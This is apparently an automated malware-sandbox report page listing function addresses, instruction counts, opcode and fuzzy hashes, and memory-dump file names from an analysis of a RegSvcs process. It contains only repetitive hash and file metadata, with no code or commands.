Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8876ef4560123714944e026a14010e42f3722aa8b4e83154c385705386cccce
Instruction ID: 96c6187ca3bc0953375cf4696a813ea44bc29946370d8359e8e92b2b14ae46e1
Opcode Fuzzy Hash: b8876ef4560123714944e026a14010e42f3722aa8b4e83154c385705386cccce
Instruction Fuzzy Hash: 4CF0127210001EBFEF019F94DD80DAF7B7EFF55298B104165FA1196160D631DD21E7A0

Function 015CC0F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1087a5e86576f0025fbb9755ab04cb6273f71e914f96434eb9e851e8f34128c
Instruction ID: 195b1f927ff94879a7e94e28aa9f781393e0d72282431a19ea3fe4305e836304
Opcode Fuzzy Hash: c1087a5e86576f0025fbb9755ab04cb6273f71e914f96434eb9e851e8f34128c
Instruction Fuzzy Hash: D9F024717442425FF3249A9A9C01B3632DAF7C8A50F69846EEB0D8F2C1E971DC018394

Function 0160656A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7613ed5725ae26951b814b2b4d73d26a3d8a55f56e1292bc6d64d9523a12414
Instruction ID: ceb0d871b7bce6645abd22ee3ec05daf0e3b46e3d702a59de64902d28f45801f
Opcode Fuzzy Hash: d7613ed5725ae26951b814b2b4d73d26a3d8a55f56e1292bc6d64d9523a12414
Instruction Fuzzy Hash: F901A4706007859FE327972CCD49B2637E5BB40B44F484194BA019BBE6EB69E4128214

Function 0160A5D0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb03fb6fbbbcf7323a5815dc0932391ed8fb0319782770736c3032199dc3bf8a
Instruction ID: fa332cc1ff9834ad2caea81e4bc88789375ac7671a133307473089a5b2c11c94
Opcode Fuzzy Hash: eb03fb6fbbbcf7323a5815dc0932391ed8fb0319782770736c3032199dc3bf8a
Instruction Fuzzy Hash: 8B01D1B2260700AFD312DF54CD55F2677F8E785755F04893DA648CB290E374D804CB4A

Function 015E0218 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c0373b3ab838d333729747378b0396c60f30be87220af6b14c9d515f57f9f86
Instruction ID: 566997a7d92a75041f0bdebe734e9588d3e77e1c5b4c409f5a5eac65d5bc94e2
Opcode Fuzzy Hash: 7c0373b3ab838d333729747378b0396c60f30be87220af6b14c9d515f57f9f86
Instruction Fuzzy Hash: AEF03A75E02646DFD36AAF58CC48734BBE1FB01B00FA1956AE5029F3D5D2B4D844CB61

Function 0165E872 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8131d6dfb1e0f05e7222055ba00f4a0047b676927548f67fe4833d003efa681a
Instruction ID: 42d3fd4addde9a4c64795693cf418115a735955640540853b44fb03632b5f206
Opcode Fuzzy Hash: 8131d6dfb1e0f05e7222055ba00f4a0047b676927548f67fe4833d003efa681a
Instruction Fuzzy Hash: 81F0B432B505129BDB618A4DCC80F12F7A8BFD5A60F1A0064AA089F760C362ED0287D0

Function 0165C89D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65fe4d9fe019bb5b0f501f23e8e18750ae74e401929f8e9be2d23ec7841c1b65
Instruction ID: f79541e40282054abf9fc18e04af5f0a2e7ebb99b333920af0b9368af0a728a5
Opcode Fuzzy Hash: 65fe4d9fe019bb5b0f501f23e8e18750ae74e401929f8e9be2d23ec7841c1b65
Instruction Fuzzy Hash: B0F0C2706053059FC354EF28C946A1BBBE8FF98710F44465EBC98DB394EA34E901C796

Function 015E266C Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d370d4fcb2a7ed36736750702eb12dcd4492ecf746e9f7d30bb9577beb8a549e
Instruction ID: 93d2661c23b23e407e60676444f21d0a7749c6302b7fa1fa5762b32cd6656311
Opcode Fuzzy Hash: d370d4fcb2a7ed36736750702eb12dcd4492ecf746e9f7d30bb9577beb8a549e
Instruction Fuzzy Hash: 1CF09072B146429FD312DF6DD8407A6B3E8FF95211B044176E545CB305E778DA12CB90

Function 01600854 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction ID: 323114b2b72ada9712516d6c5db718c46e0fedd9eadb5484d44a1f776b293dea
Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction Fuzzy Hash: 5DF0B472610205AFE719DF25CC05F57B6E9FF99344F258078A545DB2E0FAB0DE01C654

Function 0165C912 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9977d2f4c007c260dac72701487561e5df88ae30c0ce5381514c3ca02c650777
Instruction ID: 1ee9a94097761541f19fe05c76f53c1a03d7e0e01c0dd9b3e7ed0a71e1b9d1e0
Opcode Fuzzy Hash: 9977d2f4c007c260dac72701487561e5df88ae30c0ce5381514c3ca02c650777
Instruction Fuzzy Hash: D6F06270A0124DDFCB04EF69C915A6EB7F8FF58340F008059B955EB385DA78EA01CB54

Function 015D47FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d283e78fe3cef80cdbdc3386f2d409be096d28c582add828bb634790b7149b2
Instruction ID: 6cfddd92bc4f657913871ed0b4f53e26938c5bbaaa65bfa6552a11a1b8d8890e
Opcode Fuzzy Hash: 7d283e78fe3cef80cdbdc3386f2d409be096d28c582add828bb634790b7149b2
Instruction Fuzzy Hash: D2F0B4319167E19FE732CB5CC45DB29BBD4BB016A0F08496AD549CFD02C774D880C750

Function 0160C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 639cbbe050de770a2ee95fb3c97c0e5af980ddb78f8616731926174aa5d81a0b
Instruction ID: f9665563da3c430a73c99e410f84d24998be81c359e095bbd0182c2c20972d8b
Opcode Fuzzy Hash: 639cbbe050de770a2ee95fb3c97c0e5af980ddb78f8616731926174aa5d81a0b
Instruction Fuzzy Hash: 39F0BE71932A619BE33B965CCD88B137BE4AB416A0F0896A5D906C7692C760E881CA50

Function 01612619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45c25d90bbb005ca3a51a0e548ad18c23c0ce8c105f3add510330fe6c677b30c
Instruction ID: ab70a79ab45a066ecb3e7492fd7f6a89c1c6d33407407d390b1c317ee55036c3
Opcode Fuzzy Hash: 45c25d90bbb005ca3a51a0e548ad18c23c0ce8c105f3add510330fe6c677b30c
Instruction Fuzzy Hash: C6E0D8323006416BE7119E598CD4F5777AFEFD2B14F18047DB5045F296CAE2DC0986A4

Function 0164035C Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d686609aa5636bbeb8eb45ce840330d6a3fe488abb698859fe5c2a4ac7472896
Instruction ID: 0342a8f3905bb96aa3dcef6fb20e2c542f0f50135673670621483a4f5d3ab194
Opcode Fuzzy Hash: d686609aa5636bbeb8eb45ce840330d6a3fe488abb698859fe5c2a4ac7472896
Instruction Fuzzy Hash: 51F06D32255AC2DFE7278B1CCD48B587BA0BB01B60F180695B7218FAE1D7689840CA04

Function 016401DA Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695efabd4245ad5634dfe4a889b4c53fedba2a3276a13ee318552dc71ff97b6c
Instruction ID: 57e520a7c5268c9c84beac95fa7bca656de4b076c1f5d98a72362013cec3eeb7
Opcode Fuzzy Hash: 695efabd4245ad5634dfe4a889b4c53fedba2a3276a13ee318552dc71ff97b6c
Instruction Fuzzy Hash: CDF03770214B81DFD321CFA8D840B96B7E4FF08300F00866AB294CB7A1D778E840CB01

Function 015D0710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: 058cb7056930cd1d38d24ef1aedfcc081b1ccf3405e1059896db548fe580f0ca
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: D2F0E53A2047559BDB2ADF19C440A957BE4FB41350F010494FC528F351E732E981CF94

Function 016049D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: eee4270ee221f35ca84a7e3e43e76e10522fd9536e8a54f693e4c20d43135243
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: B9E09232254145ABD73A2A598C00B6776A6ABD07A0F150429EB008B298DF74DC81D798

Function 015CEC20 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2902f53431a9e488bb3a35122719d683f2200cde1b251d880592bb7dfab3b44
Instruction ID: 1a2a9eeb2562bc43cc84f7792eba5a4af8e71ae72e809ba65ad5bde87f9bf487
Opcode Fuzzy Hash: b2902f53431a9e488bb3a35122719d683f2200cde1b251d880592bb7dfab3b44
Instruction Fuzzy Hash: 0EF0A031106289AFEB188F84C84BF193F99FB00B24F04841DF5088F052CB74DC85EB44

Function 01654CA8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43eecd3c08fe7f7df93ce42b225f7ebba8bd63f8cfa5a27548bae60b679425d2
Instruction ID: 43bff8fe208629bdad1f6c29a4aaae74f8510b925b6ff2e9d08ea6ef79dce3fb
Opcode Fuzzy Hash: 43eecd3c08fe7f7df93ce42b225f7ebba8bd63f8cfa5a27548bae60b679425d2
Instruction Fuzzy Hash: F0E0263320015226EB3563699D08FD37F96EFC17B0F050029BA0A8B690DF21C471C240

Function 015D25E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78a1ceeab0afc04e5e9c748e06bb91ad7226533ef15c0799ac7668bc300b4ef6
Instruction ID: 1ce74873ef4faf086d0b05f99077bce33d78663b0a6693cb386b75b214722122
Opcode Fuzzy Hash: 78a1ceeab0afc04e5e9c748e06bb91ad7226533ef15c0799ac7668bc300b4ef6
Instruction Fuzzy Hash: B4E092321006959BC321FB2ADD11F9A77AAFFA0364F114519B1155B190CB30A810C798

Function 01654000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
